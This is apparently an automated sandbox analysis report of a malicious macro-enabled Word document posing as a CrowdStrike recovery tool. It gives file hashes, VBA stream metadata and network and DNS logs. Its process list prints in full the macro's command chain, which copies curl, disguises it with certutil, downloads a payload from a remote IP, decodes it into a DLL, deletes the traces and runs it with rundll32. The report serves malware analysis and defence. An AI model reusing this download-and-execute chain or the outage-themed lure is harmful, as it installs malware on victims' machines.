        Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
        File type:Microsoft Word 2007+
        Entropy (8bit):7.938940748289286
        TrID:
        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
        • ZIP compressed archive (8000/1) 5.84%
        File name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
        File size:310'160 bytes
        MD5:dd2100dfa067caae416b885637adc4ef
        SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
        SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
        SHA512:809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
        SSDEEP:6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
        TLSH:1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
        File Content Preview:PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................
        Icon Hash:65e6a3a3afbfb9af
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Author:Le Nho Thanh
        Template:Normal.dotm
        Last Saved By:David
        Revion Number:3
        Total Edit Time:4
        Create Time:2024-07-19T10:29:00Z
        Last Saved Time:2024-07-22T09:13:00Z
        Number of Pages:9
        Number of Words:2526
        Number of Characters:14404
        Creating Application:Microsoft Office Word
        Security:0
        Number of Lines:120
        Number of Paragraphs:33
        Thumbnail Scaling Desired:false
        Company:Microsoft
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0000
        General
        Stream Path:VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:27601
        Data ASCII:. . . . . . . . . t . . . . . . b . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . $ X . E - . B / . 8 [ . a i s . B e 2 . . . . . . . . . . . . . . . . . . . . Z . L Z . i F Z Z g 6 . . . . . . . . . . . . . . . . . . . . . . x . . . . Z . L Z . i F Z Z g 6 $ X . E - . B / . 8 [ . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . S " . . . . S . . . . . S " . . . . . < 2 . . . . . > " . . . . . < X . . . . . . . . . . . . . . . . . . L . . . .
        Data Raw:01 16 03 00 04 00 01 00 00 74 0b 00 00 e4 00 00 00 62 02 00 00 02 0c 00 00 10 0c 00 00 e0 5d 00 00 04 00 00 00 01 00 00 00 97 d9 f8 db 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 58 0c 45 2d c6 bb 42 af 2f 07 e1 38 5b 0b 81 c3 61 69 73 c0 cd b3 42 91 9f a4 ef 65 97 32 fe 00 00 00 00 00 00 00 00 00 00 00 00 00

        General
        Stream Path:PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:376
        Entropy:5.349004928853029
        Base64 Encoded:True
        Data ASCII:I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
        Data Raw:49 44 3d 22 7b 36 33 39 34 30 44 31 37 2d 37 42 43 37 2d 34 31 34 36 2d 42 41 39 35 2d 31 33 38 39 46 46 37 30 32 43 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
        General
        Stream Path:PROJECTwm
        CLSID:
        File Type:data
        Stream Size:41
        Entropy:3.0773844850752607
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
        General
        Stream Path:VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2976
        Entropy:4.617966626265468
        Base64 Encoded:False
        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        General
        Stream Path:VBA/__SRP_0
        CLSID:
        File Type:data
        Stream Size:2782
        Entropy:3.5082390293182035
        Base64 Encoded:False
        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
        General
        Stream Path:VBA/__SRP_1
        CLSID:
        File Type:data
        Stream Size:174
        Entropy:1.6032810527820052
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
        General
        Stream Path:VBA/__SRP_2
        CLSID:
        File Type:data
        Stream Size:1224
        Entropy:2.0062113510689086
        Base64 Encoded:False
        Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00
        General
        Stream Path:VBA/__SRP_3
        CLSID:
        File Type:data
        Stream Size:356
        Entropy:2.1693699541959686
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
        General
        Stream Path:VBA/dir
        CLSID:
        File Type:data
        Stream Size:514
        Entropy:6.2857106919283545
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
        Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
        TimestampSource PortDest PortSource IPDest IP
        Jul 22, 2024 15:52:01.657860994 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:01.657906055 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:01.657973051 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:01.658164978 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:01.658181906 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.368962049 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.369291067 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:02.369309902 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.370276928 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.370346069 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:02.371309996 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:02.371380091 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.566080093 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:02.566097975 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:02.765502930 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:10.264959097 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.264991999 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.265041113 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.265232086 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.265249014 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.954627991 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.954966068 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.954987049 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.955338955 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.955426931 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.956016064 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.956069946 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.957026005 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.957088947 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.957223892 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:10.957233906 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:10.957267046 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:11.004507065 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:11.156836987 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:11.231894016 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:11.232101917 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:11.232260942 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:11.233057022 CEST49171443192.168.2.22172.217.168.14
        Jul 22, 2024 15:52:11.233095884 CEST44349171172.217.168.14192.168.2.22
        Jul 22, 2024 15:52:12.268873930 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:12.268944025 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:52:12.269156933 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:13.470407009 CEST49170443192.168.2.22142.250.203.100
        Jul 22, 2024 15:52:13.470443964 CEST44349170142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:01.925507069 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:01.925563097 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:01.925669909 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:02.019361973 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:02.019392967 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.712658882 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.713826895 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:02.713850975 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.714171886 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.715807915 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:02.715877056 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.920512915 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:02.920711994 CEST49174443192.168.2.22142.250.203.100
        Jul 22, 2024 15:53:12.613501072 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:12.613657951 CEST44349174142.250.203.100192.168.2.22
        Jul 22, 2024 15:53:12.613740921 CEST49174443192.168.2.22142.250.203.100
        TimestampSource PortDest PortSource IPDest IP
        Jul 22, 2024 15:51:57.115956068 CEST53627518.8.8.8192.168.2.22
        Jul 22, 2024 15:51:57.238284111 CEST53498818.8.8.8192.168.2.22
        Jul 22, 2024 15:51:58.478197098 CEST53639268.8.8.8192.168.2.22
        Jul 22, 2024 15:52:01.649885893 CEST5809553192.168.2.228.8.8.8
        Jul 22, 2024 15:52:01.650075912 CEST5426153192.168.2.228.8.8.8
        Jul 22, 2024 15:52:01.656579018 CEST53542618.8.8.8192.168.2.22
        Jul 22, 2024 15:52:01.657058001 CEST53580958.8.8.8192.168.2.22
        Jul 22, 2024 15:52:10.242295027 CEST6245353192.168.2.228.8.8.8
        Jul 22, 2024 15:52:10.242433071 CEST5056853192.168.2.228.8.8.8
        Jul 22, 2024 15:52:10.256547928 CEST53624538.8.8.8192.168.2.22
        Jul 22, 2024 15:52:10.284553051 CEST53505688.8.8.8192.168.2.22
        Jul 22, 2024 15:52:15.490757942 CEST53503378.8.8.8192.168.2.22
        Jul 22, 2024 15:52:22.489500999 CEST53534068.8.8.8192.168.2.22
        Jul 22, 2024 15:52:32.836777925 CEST53646878.8.8.8192.168.2.22
        Jul 22, 2024 15:52:50.519622087 CEST53519558.8.8.8192.168.2.22
        Jul 22, 2024 15:52:56.966444016 CEST53530608.8.8.8192.168.2.22
        TimestampSource IPDest IPChecksumCodeType
        Jul 22, 2024 15:52:10.284624100 CEST192.168.2.228.8.8.8d050(Port unreachable)Destination Unreachable
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jul 22, 2024 15:52:01.649885893 CEST192.168.2.228.8.8.80xd6a8Standard query (0)www.google.comA (IP address)IN (0x0001)false
        Jul 22, 2024 15:52:01.650075912 CEST192.168.2.228.8.8.80xd590Standard query (0)www.google.com65IN (0x0001)false
        Jul 22, 2024 15:52:10.242295027 CEST192.168.2.228.8.8.80x8833Standard query (0)sb-ssl.google.comA (IP address)IN (0x0001)false
        Jul 22, 2024 15:52:10.242433071 CEST192.168.2.228.8.8.80xfe39Standard query (0)sb-ssl.google.com65IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jul 22, 2024 15:52:01.656579018 CEST8.8.8.8192.168.2.220xd590No error (0)www.google.com65IN (0x0001)false
        Jul 22, 2024 15:52:01.657058001 CEST8.8.8.8192.168.2.220xd6a8No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
        Jul 22, 2024 15:52:10.256547928 CEST8.8.8.8192.168.2.220x8833No error (0)sb-ssl.google.comsb-ssl.l.google.comCNAME (Canonical name)IN (0x0001)false
        Jul 22, 2024 15:52:10.256547928 CEST8.8.8.8192.168.2.220x8833No error (0)sb-ssl.l.google.com172.217.168.14A (IP address)IN (0x0001)false
        Jul 22, 2024 15:52:10.284553051 CEST8.8.8.8192.168.2.220xfe39No error (0)sb-ssl.google.comsb-ssl.l.google.comCNAME (Canonical name)IN (0x0001)false
        • sb-ssl.google.com

        Click to jump to process

        Target ID:0
        Start time:09:51:17
        Start date:22/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f3b0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:09:51:19
        Start date:22/07/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
        Imagebase:0x4a610000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:09:51:19
        Start date:22/07/2024
        Path:C:\Windows\System32\xcopy.exe
        Wow64 process (32bit):false
        Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
        Imagebase:0xff890000
        File size:43'008 bytes
        MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:5
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
        Imagebase:0xffa90000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:6
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
        Imagebase:0xff300000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:7
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Users\user\AppData\Local\Temp\curl.exe
        Wow64 process (32bit):false
        Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
        Imagebase:0x13f480000
        File size:530'944 bytes
        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 0%, ReversingLabs
        Reputation:moderate
        Has exited:true

        Target ID:8
        Start time:09:51:23
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
        Imagebase:0xff960000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:9
        Start time:09:51:23
        Start date:22/07/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
        Imagebase:0xff0a0000
        File size:45'568 bytes
        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:10
        Start time:09:51:54
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:11
        Start time:09:51:55
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:14
        Start time:09:51:58
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:15
        Start time:09:52:02
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:16
        Start time:09:52:16
        Start date:22/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f3b0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:17
        Start time:09:52:23
        Start date:22/07/2024
